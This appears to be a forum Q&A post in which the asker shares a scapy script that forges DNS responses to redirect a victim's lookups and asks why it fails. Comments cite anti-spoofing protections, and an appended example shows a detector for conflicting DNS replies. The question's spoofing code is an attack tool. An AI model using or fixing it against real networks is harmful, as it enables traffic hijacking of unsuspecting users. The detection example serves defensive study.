
I'm trying to perform DNS spoofing, but it seems it doesn't impact the victim. The packet shows up in Wireshark the way it needs to be, but the victim still gets to the correct IP and not the one I want (facebook.com).

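from scapy.all import IP, UDP, DNS, DNSRR, send, sniff

def dns_spoof(pkt):
    redirect_to = '157.240.195.35' # facebook.com IP

    # Build a response that mirrors the query's addresses, ports and transaction ID
    spoofed_pkt = IP(dst=pkt[IP].src, src=pkt[IP].dst)/\
                    UDP(dport=pkt[UDP].sport, sport=pkt[UDP].dport)/\
                    DNS(id=pkt[DNS].id, qd=pkt[DNS].qd, aa = 1, qr=1, \
                    an=DNSRR(rrname=pkt[DNS].qd.qname,  ttl=10, rdata=redirect_to))
    send(spoofed_pkt)

# main (the `filtering` function is not shown in the post)
pk = sniff(lfilter=filtering, prn=dns_spoof)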

Picture from Wireshark (trying to spoof when the victim enters cool.com): [image]

Why doesn't it work?

  • There are anti-spoofing protections in modern DNS clients. – Barmar Feb 25 '21 at 21:55
  • so theoretically the code should work but because of the protections, it doesn't? How can I make it work? – Victor Hanukayev Feb 25 '21 at 21:59
  • You can't, that's the whole point of anti-spoofing protections. – Barmar Feb 25 '21 at 22:00
  • transaction id of response should match transaction id of request for victim to accept "fake" response – Maxim Sagaydachny Feb 26 '21 at 15:46
  • @MaximSagaydachny which is already the case here: "id=pkt[DNS].id". Which is one anti-spoofing method but certainly not the only one. The question is anyway offtopic here as not related to programming (and missing important details anyway, like the network setup, who and where the victim is, which applications - browsers do use DNS over HTTPS nowadays, etc.). – Patrick Mevzek Feb 26 '21 at 20:27

0 Answers
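Added example, not part of the original question or comments: a reply that copies the query's transaction ID, as discussed in the comments, shows up to a passive monitor as a second response to one query carrying different data. The sketch below flags that pattern; the `Resp` record layout, the 2-second window and the sample addresses are assumptions constructed for illustration.

```python
from collections import namedtuple

# One parsed DNS response as a passive sensor might log it (constructed schema).
Resp = namedtuple("Resp", "ts client txid qname answers aa")

def find_conflicts(responses, window=2.0):
    """Flag queries answered twice within `window` seconds with different data."""
    first_seen, alerts = {}, []
    for r in sorted(responses, key=lambda x: x.ts):
        key = (r.client, r.txid, r.qname.lower().rstrip("."))
        prev = first_seen.get(key)
        if prev is None or r.ts - prev.ts > window:
            first_seen[key] = r          # first response seen for this query
            continue
        if frozenset(r.answers) != frozenset(prev.answers):
            alerts.append({
                "client": r.client,
                "txid": r.txid,
                "qname": key[2],
                "first": sorted(prev.answers),
                "second": sorted(r.answers),
                "aa_differs": prev.aa != r.aa,   # AA bit disagrees between replies
            })
    return alerts

# Constructed sample: documentation-range addresses, not real traffic.
SAMPLE = [
    Resp(10.000, "192.0.2.10", 0x1A2B, "cool.com.", ["198.51.100.7"], True),
    Resp(10.018, "192.0.2.10", 0x1A2B, "cool.com.", ["203.0.113.5"], False),
    # Retransmitted identical answer: not a conflict.
    Resp(11.000, "192.0.2.10", 0x3C4D, "example.org.", ["203.0.113.9"], False),
    Resp(11.050, "192.0.2.10", 0x3C4D, "example.org.", ["203.0.113.9"], False),
    # Same ID reused long after the window: treated as a new query.
    Resp(90.000, "192.0.2.10", 0x1A2B, "cool.com.", ["203.0.113.5"], False),
]

if __name__ == "__main__":
    for alert in find_conflicts(SAMPLE):
        print(alert)
```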